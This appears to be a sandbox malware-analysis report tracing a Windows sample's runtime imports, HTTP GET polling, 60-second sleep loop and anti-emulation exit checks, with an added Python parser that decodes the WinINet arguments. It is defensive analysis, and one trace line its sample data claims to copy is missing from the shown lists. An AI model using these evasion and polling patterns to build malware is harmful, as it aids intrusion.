                              • LoadLibraryA.KERNEL32(0144D098,?,00A65CA3,00A70AEB,?,?,?,?,?,?,?,?,?,?,00A70AEA,00A70AE3), ref: 00A6A04E
                              • LoadLibraryA.KERNEL32(0144D1B8,?,00A65CA3,00A70AEB,?,?,?,?,?,?,?,?,?,?,00A70AEA,00A70AE3), ref: 00A6A060
                              • LoadLibraryA.KERNEL32(0144D1E8,?,00A65CA3,00A70AEB,?,?,?,?,?,?,?,?,?,?,00A70AEA,00A70AE3), ref: 00A6A072
                              • LoadLibraryA.KERNEL32(0144D1D0,?,00A65CA3,00A70AEB,?,?,?,?,?,?,?,?,?,?,00A70AEA,00A70AE3), ref: 00A6A083
                              • LoadLibraryA.KERNEL32(0144D320,?,00A65CA3,00A70AEB,?,?,?,?,?,?,?,?,?,?,00A70AEA,00A70AE3), ref: 00A6A095
                              • LoadLibraryA.KERNEL32(0144D038,?,00A65CA3,00A70AEB,?,?,?,?,?,?,?,?,?,?,00A70AEA,00A70AE3), ref: 00A6A0A7
                              • LoadLibraryA.KERNEL32(0144D4A0,?,00A65CA3,00A70AEB,?,?,?,?,?,?,?,?,?,?,00A70AEA,00A70AE3), ref: 00A6A0B8
                              • GetProcAddress.KERNEL32(77040000,01435268), ref: 00A6A0DA
                              • GetProcAddress.KERNEL32(77040000,0144D608), ref: 00A6A0F2
                              • GetProcAddress.KERNEL32(77040000,01448C58), ref: 00A6A10A
                              • GetProcAddress.KERNEL32(77040000,0144D530), ref: 00A6A123
                              • GetProcAddress.KERNEL32(77040000,01435328), ref: 00A6A13B
                              • GetProcAddress.KERNEL32(70530000,0143A6B8), ref: 00A6A160
                              • GetProcAddress.KERNEL32(70530000,01435208), ref: 00A6A179
                              • GetProcAddress.KERNEL32(70530000,0143A6E0), ref: 00A6A191
                              • GetProcAddress.KERNEL32(70530000,0144D590), ref: 00A6A1A9
                              • GetProcAddress.KERNEL32(70530000,0144D620), ref: 00A6A1C2
                              • GetProcAddress.KERNEL32(70530000,01435188), ref: 00A6A1DA
                              • GetProcAddress.KERNEL32(70530000,014350E8), ref: 00A6A1F2
                              • GetProcAddress.KERNEL32(70530000,0144D5A8), ref: 00A6A20B
                              • GetProcAddress.KERNEL32(768D0000,01435348), ref: 00A6A22C
                              • GetProcAddress.KERNEL32(768D0000,01435368), ref: 00A6A244
                              • GetProcAddress.KERNEL32(768D0000,0144D338), ref: 00A6A25D
                              • GetProcAddress.KERNEL32(768D0000,0144D5C0), ref: 00A6A275
                              • GetProcAddress.KERNEL32(768D0000,01435148), ref: 00A6A28D
                              • GetProcAddress.KERNEL32(75790000,0143A780), ref: 00A6A2B3
                              • GetProcAddress.KERNEL32(75790000,0143A7D0), ref: 00A6A2CB
                              • GetProcAddress.KERNEL32(75790000,0144D548), ref: 00A6A2E3
                              • GetProcAddress.KERNEL32(75790000,01435228), ref: 00A6A2FC
                              • GetProcAddress.KERNEL32(75790000,014351A8), ref: 00A6A314
                              • GetProcAddress.KERNEL32(75790000,0143A7A8), ref: 00A6A32C
                              • GetProcAddress.KERNEL32(75A10000,0144D380), ref: 00A6A352
                              • GetProcAddress.KERNEL32(75A10000,01434FC8), ref: 00A6A36A
                              • GetProcAddress.KERNEL32(75A10000,01448B68), ref: 00A6A382
                              • GetProcAddress.KERNEL32(75A10000,0144D398), ref: 00A6A39B
                              • GetProcAddress.KERNEL32(75A10000,0144D350), ref: 00A6A3B3
                              • GetProcAddress.KERNEL32(75A10000,014351E8), ref: 00A6A3CB
                              • GetProcAddress.KERNEL32(75A10000,014352E8), ref: 00A6A3E4
                              • GetProcAddress.KERNEL32(75A10000,0144D368), ref: 00A6A3FC
                              • GetProcAddress.KERNEL32(75A10000,0144D3B0), ref: 00A6A414
                              • GetProcAddress.KERNEL32(76850000,01434F88), ref: 00A6A436
                              • GetProcAddress.KERNEL32(76850000,0144D488), ref: 00A6A44E
                              • GetProcAddress.KERNEL32(76850000,0144D500), ref: 00A6A466
                              • GetProcAddress.KERNEL32(76850000,0144D458), ref: 00A6A47F
                              • GetProcAddress.KERNEL32(76850000,0144D560), ref: 00A6A497
                              • GetProcAddress.KERNEL32(75690000,01434FA8), ref: 00A6A4B8
                              • GetProcAddress.KERNEL32(75690000,01435028), ref: 00A6A4D1
                              • GetProcAddress.KERNEL32(769C0000,01435248), ref: 00A6A4F2
                              • GetProcAddress.KERNEL32(769C0000,0144D3C8), ref: 00A6A50A
                              • GetProcAddress.KERNEL32(6F8C0000,014351C8), ref: 00A6A530
                              • GetProcAddress.KERNEL32(6F8C0000,01435168), ref: 00A6A548
                              • GetProcAddress.KERNEL32(6F8C0000,01434FE8), ref: 00A6A560
                              • GetProcAddress.KERNEL32(6F8C0000,0144D470), ref: 00A6A579
                              • GetProcAddress.KERNEL32(6F8C0000,01435068), ref: 00A6A591
                              • GetProcAddress.KERNEL32(6F8C0000,01435048), ref: 00A6A5A9
                              • GetProcAddress.KERNEL32(6F8C0000,01435288), ref: 00A6A5C2
                              • GetProcAddress.KERNEL32(6F8C0000,014352A8), ref: 00A6A5DA
                              • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 00A6A5F1
                              • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 00A6A607
                              • GetProcAddress.KERNEL32(75D90000,0144D3E0), ref: 00A6A629
                              • GetProcAddress.KERNEL32(75D90000,01448C18), ref: 00A6A641
                              • GetProcAddress.KERNEL32(75D90000,0144D3F8), ref: 00A6A659
                              • GetProcAddress.KERNEL32(75D90000,0144D410), ref: 00A6A672
                              • GetProcAddress.KERNEL32(76470000,01435008), ref: 00A6A693
                              • GetProcAddress.KERNEL32(70200000,0144D428), ref: 00A6A6B4
                              • GetProcAddress.KERNEL32(70200000,014352C8), ref: 00A6A6CD
                              • GetProcAddress.KERNEL32(70200000,0144D4B8), ref: 00A6A6E5
                              • GetProcAddress.KERNEL32(70200000,0144D4D0), ref: 00A6A6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: 65220bac4d33096ef678a055947ac1a13f243c4bf2e18a8aa14b1662f0547179
                              • Instruction ID: 3102950c568a1bdaf4c2411e04653092e0f82e6db0ee48c2a881f3b829832472
                              • Opcode Fuzzy Hash: 65220bac4d33096ef678a055947ac1a13f243c4bf2e18a8aa14b1662f0547179
                              • Instruction Fuzzy Hash: BE62F9B5610240AFC344DFA9ED8EB6E37F9F78C601724851BA609C3274D6399842DFD6

                               Control-flow Graph (rendered graph; legend: Executed / Not Executed)
                               • Function 00A56280-00A5652D, HTTP GET routine. The entry block 00A56280-00A5630B calls 00A6A7A0, 00A547B0 (lstrlen, InternetCrackUrlA) and 00A6A740, then InternetOpenA and StrCmpCA. On the success path it calls InternetConnectA (00A5631E-00A56342), HttpOpenRequestA (00A56364-00A56392), optionally InternetSetOptionA (00A5639E-00A563BF), then HttpSendRequestA and HttpQueryInfoA (00A563C5-00A56405) and 00A68940 (00A5642C-00A5644B), and enters a loop over InternetReadFile (00A56456-00A56480) whose body 00A5648D-00A564C5 calls 00A6A9B0, 00A6A8A0 and 00A6A800 before the next read; the loop leaves through 00A5648B. A failed InternetConnectA or HttpOpenRequestA, and the normal exit from the read loop, lead into the chained InternetCloseHandle blocks (00A564C7-00A564EF, 00A564F5-00A564F9, 00A564FF-00A56503) and then 00A56509-00A56525 (00A6A7A0, 00A6A800 x2), ending at 00A56528-00A5652D. The error blocks after HttpQueryInfoA (00A56407-00A56427) and after 00A68940 (00A564C9-00A564E9) each call 00A6A740 and 00A6A800 x2 and jump straight to 00A56528, bypassing the InternetCloseHandle blocks.
                              APIs
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                                • Part of subcall function 00A547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A54839
                                • Part of subcall function 00A547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A54849
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                              • InternetOpenA.WININET(00A70DFE,00000001,00000000,00000000,00000000), ref: 00A562E1
                              • StrCmpCA.SHLWAPI(?,0144F340), ref: 00A56303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A56335
                              • HttpOpenRequestA.WININET(00000000,GET,?,0144EB08,00000000,00000000,00400100,00000000), ref: 00A56385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A563BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A563D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00A563FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00A5646D
                              • InternetCloseHandle.WININET(00000000), ref: 00A564EF
                              • InternetCloseHandle.WININET(00000000), ref: 00A564F9
                              • InternetCloseHandle.WININET(00000000), ref: 00A56503
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 79d22bdfa3e6003dce0a51679c0333e9fedd2a943e7ba6c7f982840fb37f6281
                              • Instruction ID: 0d53210923e9b8c041f5d2deccf18218c7922f7155cb52afe57a1fb54a4cd8d3
                              • Opcode Fuzzy Hash: 79d22bdfa3e6003dce0a51679c0333e9fedd2a943e7ba6c7f982840fb37f6281
                              • Instruction Fuzzy Hash: 18714D71A00218EBDB24DFA0CD49BEE7778FB54701F508199F50AAB1D0DBB46A89CF91

                               Control-flow Graph (rendered graph; legend: Executed / Not Executed)
                               • Function 00A65510-00A65AC6, loop with a Sleep delay. The prologue 00A65510-00A65577 calls 00A65AD0, 00A6A820 (x3) and 00A6A740 (x4); the loop head is 00A6557C-00A65583. Each iteration runs up to three rounds of the same shape, each taking one of two forms: 00A6A820, 00A6A7A0, 00A51590, 00A651F0 (for example 00A65585-00A655B6) or 00A6A740 (x2), 00A51590, 00A652C0 (for example 00A655D7-00A6564C), each followed by 00A6A8A0, 00A6A800, 00A6AAD0 and a StrCmpCA against "ERROR" (refs 00A65644, 00A656A1, 00A6578B, 00A65857, 00A65940, 00A65A0C). The three rounds occupy 00A65585-00A656A9, 00A656C5-00A6585F and 00A6587B-00A65A14. After the last comparison one exit calls Sleep (00A65A16-00A65A21) and returns to the loop head; the other exits (00A657DC-00A65844, 00A65991-00A659F9, 00A65A28-00A65A91) call 00A51670, 00A66560 and 00A51550 and leave the function at 00A65AC3-00A65AC6.
                              APIs
                                • Part of subcall function 00A6A820: lstrlen.KERNEL32(00A54F05,?,?,00A54F05,00A70DDE), ref: 00A6A82B
                                • Part of subcall function 00A6A820: lstrcpy.KERNEL32(00A70DDE,00000000), ref: 00A6A885
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A65644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A656A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A65857
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                                • Part of subcall function 00A651F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A65228
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                                • Part of subcall function 00A652C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A65318
                                • Part of subcall function 00A652C0: lstrlen.KERNEL32(00000000), ref: 00A6532F
                                • Part of subcall function 00A652C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00A65364
                                • Part of subcall function 00A652C0: lstrlen.KERNEL32(00000000), ref: 00A65383
                                • Part of subcall function 00A652C0: lstrlen.KERNEL32(00000000), ref: 00A653AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A6578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A65940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A65A0C
                              • Sleep.KERNEL32(0000EA60), ref: 00A65A1B
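The API lists above record every argument as a raw column. The 104 GetProcAddress calls at 00A69C2D-00A6A6FD pass the export name as a pointer in all but two cases (InternetSetOptionA and HttpQueryInfoA, both resolved from the module at 6F8C0000), so 102 of the resolved names are not readable in the trace, and the WinINet calls at 00A562E1-00A56503 and the Sleep at 00A65A1B carry constants that the report does not decode. The Python below is an added example written for this page, not code from the Joe Sandbox report or from the sample: it parses lines in the report's own "APIs" format (including the indented "Part of subcall function" lines), counts GetProcAddress calls per module handle while separating plaintext names from bare pointers, and names the WinINet constants with their documented Win32 values. SAMPLE_TRACE is copied from the lists above; the constant tables are not on the page and come from the Windows SDK headers.

```python
"""Parse Joe Sandbox 'APIs' trace lines and decode the recorded arguments.

Added example, not code from the Joe Sandbox report or from the sample. SAMPLE_TRACE
is copied from the report's API lists; the constant tables are documented Win32 values."""
from __future__ import annotations
import re
from collections import defaultdict
from dataclasses import dataclass

# "Name.MODULE(args), ref: ADDR" or argument-less "Name.MODULE ref: ADDR", optionally
# prefixed with "Part of subcall function XXXX:" as on the indented lines of the report.
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?(?P<api>\w+)\."
    r"(?P<mod>\w+)(?:\((?P<args>.*?)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$", re.I)

SAMPLE_TRACE = """\
• GetProcAddress.KERNEL32(77190000,01435648), ref: 00A69C2D
• GetProcAddress.KERNEL32(6F8C0000,014352A8), ref: 00A6A5DA
• GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 00A6A5F1
• GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 00A6A607
  • Part of subcall function 00A547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A54849
• InternetOpenA.WININET(00A70DFE,00000001,00000000,00000000,00000000), ref: 00A562E1
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A56335
• HttpOpenRequestA.WININET(00000000,GET,?,0144EB08,00000000,00000000,00400100,00000000), ref: 00A56385
• InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A563BF
• HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00A563FD
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00A5646D
• Sleep.KERNEL32(0000EA60), ref: 00A65A1B
• StrCmpCA.SHLWAPI(00000000,block), ref: 00A617C5
• ExitProcess.KERNEL32 ref: 00A617D1
"""

@dataclass
class Call:
    api: str
    module: str              # DLL the import belongs to (KERNEL32, WININET, ...)
    args: list[str]          # raw argument columns; "?" means the sandbox did not record it
    ref: str                 # call-site address
    subcall_of: str | None   # set for "Part of subcall function ..." lines

def parse_trace(text: str) -> list[Call]:
    calls = []
    for m in filter(None, map(_LINE.match, text.splitlines())):
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(Call(m["api"], m["mod"], args, m["ref"].upper(), m["sub"]))
    return calls

def _int(arg: str) -> int | None:
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None

def getprocaddress_summary(calls: list[Call]) -> dict[str, dict]:
    """Per module handle: GetProcAddress count, split into plaintext export names and bare
    pointers (a name built or decrypted at runtime, which the trace therefore cannot show)."""
    out = defaultdict(lambda: {"total": 0, "pointer": 0, "plaintext": []})
    for c in calls:
        if c.api == "GetProcAddress" and len(c.args) >= 2:
            row = out[c.args[0].upper()]
            row["total"] += 1
            if _int(c.args[1]) is None and c.args[1] != "?":
                row["plaintext"].append(c.args[1])
            else:
                row["pointer"] += 1
    return dict(out)

INTERNET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}
INTERNET_OPTION = {2: "INTERNET_OPTION_CONNECT_TIMEOUT", 31: "INTERNET_OPTION_SECURITY_FLAGS", 41: "INTERNET_OPTION_USER_AGENT"}
HTTP_QUERY = {5: "HTTP_QUERY_CONTENT_LENGTH", 19: "HTTP_QUERY_STATUS_CODE", 22: "HTTP_QUERY_RAW_HEADERS_CRLF"}
INTERNET_FLAGS = {  # HttpOpenRequestA dwFlags bits
    0x80000000: "INTERNET_FLAG_RELOAD", 0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION", 0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}

def decode_flags(value: int, table: dict[int, str]) -> list[str]:
    names = [name for bit, name in table.items() if value & bit]
    unknown = value & ~sum(bit for bit in table if value & bit)   # bits not in the table stay visible
    return names + ([f"0x{unknown:08X}"] if unknown else [])

def annotate(c: Call) -> dict:
    """Decode the arguments of one call that a reader of the trace would want named."""
    a = c.args + [""] * 8            # pad so short or malformed lines cannot raise IndexError
    if c.api == "InternetOpenA":
        return {"dwAccessType": INTERNET_OPEN_TYPE.get(_int(a[1]), a[1])}
    if c.api == "InternetConnectA":
        return {"nServerPort": a[2], "dwService": INTERNET_SERVICE.get(_int(a[5]), a[5])}
    if c.api == "HttpOpenRequestA":
        return {"lpszVerb": a[1], "dwFlags": decode_flags(_int(a[6]) or 0, INTERNET_FLAGS)}
    if c.api == "InternetSetOptionA":
        return {"dwOption": INTERNET_OPTION.get(_int(a[1]), a[1]), "dwBufferLength": _int(a[3])}
    if c.api == "HttpQueryInfoA":   # low 16 bits select the header; high bits are modifier flags
        return {"dwInfoLevel": HTTP_QUERY.get((_int(a[1]) or 0) & 0xFFFF, a[1]), "buffer_len": _int(a[3])}
    if c.api == "InternetReadFile":
        return {"dwNumberOfBytesToRead": _int(a[2])}
    if c.api == "Sleep":
        return {"dwMilliseconds": _int(a[0]), "seconds": (_int(a[0]) or 0) / 1000}
    return {}

if __name__ == "__main__":
    calls = parse_trace(SAMPLE_TRACE)
    print(getprocaddress_summary(calls))
    for c in calls:
        print(c.api, c.ref, annotate(c))
```

Run against the full lists above, the decoder reports a direct-connection (INTERNET_OPEN_TYPE_DIRECT) HTTP request (INTERNET_SERVICE_HTTP) opened as GET with INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE, a 4-byte INTERNET_OPTION_SECURITY_FLAGS write, an HTTP_QUERY_STATUS_CODE query, InternetReadFile in 1999-byte (0x7CF) chunks, and Sleep(0xEA60) = 60 s on the path that returns to the loop head at 00A6557C. Two caveats: INTERNET_OPTION_SECURITY_FLAGS is the option through which SECURITY_FLAG_IGNORE_* certificate checks are switched off, but the trace records the buffer as "?", so the value actually written cannot be confirmed from these lines; and the server name and port in InternetConnectA are likewise unrecorded, so the destination cannot be read from the API list alone.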
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 4ea861fcb1e69f33e0cce12f63adacfd268b590a6710380bf199e6f5788fc425
                              • Instruction ID: a44be8ba271b76f8568bb47b94f7c0dbd64df19645e45f058d18d0540735e05f
                              • Opcode Fuzzy Hash: 4ea861fcb1e69f33e0cce12f63adacfd268b590a6710380bf199e6f5788fc425
                              • Instruction Fuzzy Hash: 22E1EC72A10504AACB14FBB0DE96EFD7378BF64340F508529B517A7191EF346A09CFA2

                               Control-flow Graph (rendered graph; legend: Executed / Not Executed)
                               • Function 00A617A0-00A619CD. The entry block 00A617A0-00A617CD calls 00A6AAD0 and compares with StrCmpCA against "block" (ref 00A617C5); one exit goes directly to ExitProcess (00A617CF-00A617D1), the other to 00A617D7-00A617F1 (00A6AAD0 again) and on to the loop head 00A617F4-00A617F8. Each pass through 00A617FE-00A61811 reaches the multi-way branch 00A61817-00A6181A, which selects one of nine StrCmpCA comparisons (00A6185D, 00A6187F, 00A618AD, 00A618CF, 00A618F1, 00A61913, 00A61932, 00A61951, 00A61970) or one of four calls to the string-copy helper 00A6A820 (00A61821, 00A61835, 00A61849, 00A6198F); every branch rejoins at 00A6199E-00A619BD and returns to the loop head. The loop exits through 00A619C2-00A619CD (00A6A800).
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 00A617C5
                              • ExitProcess.KERNEL32 ref: 00A617D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block

                              Control-flow Graph

                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00A67542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A6757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A67603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A6760A
                              • wsprintfA.USER32 ref: 00A67640
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,014416A8), ref: 00A698A1
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,014414F8), ref: 00A698BA
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,01441678), ref: 00A698D2
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,014416C0), ref: 00A698EA
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,01441570), ref: 00A69903
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,01448B18), ref: 00A6991B
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,01435448), ref: 00A69933
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,014356C8), ref: 00A6994C
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,01441558), ref: 00A69964
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,01441708), ref: 00A6997C
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,01441720), ref: 00A69995
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,01441528), ref: 00A699AD
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,014355A8), ref: 00A699C5
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,01441750), ref: 00A699DE
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A511D0: ExitProcess.KERNEL32 ref: 00A51211
                                • Part of subcall function 00A51160: GetSystemInfo.KERNEL32(?), ref: 00A5116A
                                • Part of subcall function 00A51160: ExitProcess.KERNEL32 ref: 00A5117E
                                • Part of subcall function 00A51110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00A5112B
                                • Part of subcall function 00A51110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00A51132
                                • Part of subcall function 00A51110: ExitProcess.KERNEL32 ref: 00A51143
                                • Part of subcall function 00A51220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00A5123E
                                • Part of subcall function 00A51220: __aulldiv.LIBCMT ref: 00A51258
                                • Part of subcall function 00A51220: __aulldiv.LIBCMT ref: 00A51266
                                • Part of subcall function 00A51220: ExitProcess.KERNEL32 ref: 00A51294
                                • Part of subcall function 00A66770: GetUserDefaultLangID.KERNEL32 ref: 00A66774
                                • Part of subcall function 00A51190: ExitProcess.KERNEL32 ref: 00A511C6
